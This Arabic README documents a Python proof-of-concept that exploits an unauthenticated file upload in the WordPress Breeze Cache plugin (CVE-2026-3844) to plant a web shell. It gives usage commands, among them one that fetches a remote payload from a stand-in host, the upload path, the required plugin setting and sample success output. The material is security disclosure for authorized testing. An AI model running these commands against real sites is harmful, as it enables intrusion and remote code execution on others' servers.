
إثبات مفهوم بلغة بايثون لثغرة CVE-2026-3844، وهي رفع ملفات تعسفي غير مصادق عليه في إضافة Breeze Cache الخاصة بووردبريس، مما يتيح تنفيذ الأكواد عن بُعد. يتضمن الكشف والاستغلال والتحقق من القشرة الويب.
يحتوي هذا المستودع على سكربت إثبات مفهوم (PoC) بلغة Python لعرض ثغرة رفع ملفات تعسفي غير مصادق عليه (Unauthenticated Arbitrary File Upload) التي تؤثر على إضافة Breeze Cache لـ WordPress <= 2.4.4.
⚠️ هذا المشروع مخصص حصريًا لـ اختبارات الأمان المصرح بها، والبحث التعليمي، والتحقق الدفاعي فقط.
تستغل الثغرة وظيفة تخزين gravatar المؤقت في Breeze Cache لتخزين ملفات يتحكم بها المهاجم داخل دليل الكاش الخاص بـ WordPress.
pycurltermcolorتثبيت التبعيات:
pip install pycurl termcolor
| الملف | الوصف |
|---|---|
CVE-2026-3844.py | سكربت الاستغلال الرئيسي (PoC) |
CVE-2026-3844.yaml | قالب/إعداد YAML |
python3 CVE-2026-3844.py -u http://target.com --check-only
python3 CVE-2026-3844.py -u http://target.com
python3 CVE-2026-3844.py -u http://target.com -p https://example.com/payload.php
python3 CVE-2026-3844.py -u http://target.com -o results.txt
ينفذ السكربت الخطوات التالية:
قد يصبح الحمولة المرفوعة قابلة للوصول من:
/wp-content/cache/breeze-extra/gravatars/
قد يعتمد نجاح الاستغلال على تمكين الإعداد التالي في Breeze:
Host Files Locally - Gravatars
إذا كانت الميزة معطلة، فقد تفشل محاولات الاستغلال.
[+] Target VULNERABLE (Breeze v2.4.4)
[+] Comment posted successfully
[+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/random.php
[+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!
تم توفير هذا المستودع من أجل:
لا تستخدم هذا المشروع ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.
لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام أو الأضرار الناجمة عن هذا المشروع.
يجب على مسؤولي المواقع:
/wp-content/cache/ بحثًا عن ملفات مشبوهةتم إنشاء إثبات المفهوم هذا لمساعدة:
على فهم المخاطر الأمنية المرتبطة بآليات التخزين المؤقت غير الآمنة ورفع الملفات التعسفي.
مشروع بحث أمني / تعليمي